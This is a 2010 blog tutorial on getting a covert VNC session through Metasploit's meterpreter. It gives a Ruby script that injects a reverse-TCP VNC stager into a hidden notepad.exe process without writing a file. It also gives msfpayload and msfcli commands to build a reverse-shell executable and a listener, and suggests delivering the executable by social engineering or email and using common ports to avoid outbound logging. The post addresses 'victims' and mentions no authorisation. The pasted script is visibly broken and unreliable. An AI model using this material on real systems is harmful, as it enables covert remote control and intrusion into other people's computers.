Sunday, January 24, 2010

VNC session via meterpreter

A ruby script that utilizes memory injection to get a VNC session without losing your meterpreter session.

I had troubles getting vnc_oneport.rb working correctly. I finally realized that vnc.rb worked fine except for the fact that it leaves a file behind on the victims machine that would have to be manually deleted later. I noticed in the code that vnc_oneport didn't create a file and I wanted to know why and how. Upon review I realized that vnc_oneport injects the payload directly into memory and runs the vnc session from there. That sounds like a great solution to our vnc.rb file creation issue.
I'm fairly proud of myself here for 1 reason mainly. I've never coded in ruby before. Ok so I didn't really code anything, it has all been coded by H.D. Moore (hdm). But it took quite a bit of reading the code and testing just to get an idea of what the code is doing. Finally after hours of work I have my meterpreter add-on up and running and it works like a charm!

I had originally posted this tutorial on the remote-exploit forums. Well as most of you may already know they have moved to the new backtrack forums and they will be removing the old content in time. I'm cutting down on the amount of commands that need to be typed. It will make things slightly more difficult if you aren't familiar with metasploit and its commands. The old post was fairly long because of all the seperate commands needed so I'm going to show you how to do the same thing with less commands.

  nano /pentest/exploits/framework3/scripts/meterpreter/vnc_mem.rb

Now Copy and Paste this code: (putting code into blogger is a pain in the ass you may have to edit the code accordingly, everything looked fine in my preview but that all changed once I published it. I'm trying to use html pre tags to maintain proper spacing and line breaks. It obviously isn't working. If anyone has the solution to this please post it.)
For now you can access the code here.

# $Id: vnc_mem.rb 12-17-2009 hdm $
# Meterpreter script for obtaining a quick VNC session
# Hybrid of vnc.rb and vnc_oneport.rb
# Utilizes memory functions so no file is created
# All code written by H.D. Moore (hdm)
# Edited by hhmatt

session = client

# Options
opts =
"-h" => [ false, "This help menu"],

"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4545)"],
# "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
"-e" => [ true, "The process to run and inject into (default:notepad.exe)"])

# Default parameters
runme = "notepad.exe"
rhost = Rex::Socket.source_address("")
rport = 4545
#autoconn = true

# Option parsing
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
when "-r"
rhost = val
when "-p"
rport = val.to_i
# when "-D"
# autoconn = false
when "-e"
runme = val

# Create the agent EXE
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")

# Create a host process
pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
print_status("Host process #{runme} has PID #{pid}")
mem = note.memory.allocate(1024*32)
print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)

# Setup the multi/handler
mul = client.framework.exploits.create("multi/handler")
mul.datastore['PAYLOAD'] = "windows/vncinject/reverse_tcp"
mul.datastore['LHOST'] = rhost
mul.datastore['LPORT'] = rport
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.datastore['DisableCourtesyShell'] = true
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true)

# Execute the agent
print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})

Save and Exit. (Ctrl+O [ENTER] and then Ctrl+X) Thats the letter o not the number.

Now that we've created our ruby script for meterpreter lets generate a meterpreter payload. Make sure to edit the IP to match your current setup. This is very easy to change to a bind_tcp or any other type of meterpreter payload you want. Also feel free to encode the binary. Encoding will not be covered in this tutorial.

/pentest/exploits/framework3/./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=81 X > /tmp/meter.exe

Since we are using a reverse_tcp payload we need to setup a listener on our attacking machine. I prefer reverse_tcp because it requires no modifications to any firewalls. Your victim will be initiating the session and since NAT and most firewalls filter non-stateful connections, reverse_tcp bypasses everything easily. It is also a good idea to use well known ports while executing these functions like port 80 incase they are logging outbound traffic on unusual/uncommon ports. For this demonstration I will use port 81. Make sure to keep your IP, ports, and payload the same as the payload we created earlier.

/pentest/exploits/framework3/./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=81 E

At this point you should have a cli that has started the reverse handler and is doing nothing but listening for someone to connect at the moment.

Now is the time to get your payload executable onto our victims machine and execute it. This can be done many ways; social engineering, email, wrapped executables, etc. However you manage to get the victim to execute our payload it should spawn a meterpreter shell on our listener.

I'm not going to teach you meterpreter there's already plenty of places and people that have already done a magnificent job at doing just that. Here's how to access meterpreter help menu though.

meterpreter > ?

The rubyscript has its own help menu. You have the options to change the default port that the vnc server uses or you can change the process that it injects into. You can also tell it to connect to a different IP than yours! You can see the help menu by issuing this command:

meterpreter > vnc_mem -h

Finally to get our VNC session lets run our command and see if it works.

meterpreter > run vnc_mem

Success or failure at this point. If you have failed to create a session it could be because your listener didn't match up with the payload's IP/ports/payload. You may also want to check your inbound firewall, the issue could be coming from your machine rather than the victims.

If you check back you will see that your meterpreter session is still there and fully functional. You may have to hit enter once or twice to see it.

Feel free to use any meterpreter payload you wish. I have to warn you though that using another payload may require opening ports on the firewall and/or router and the commands will be quite different. The more comfortable you are with metasploit the better.

Thanks for reading! Feel free to comment as long as you keep it related to the material posted.

Thank You,


No comments:

Post a Comment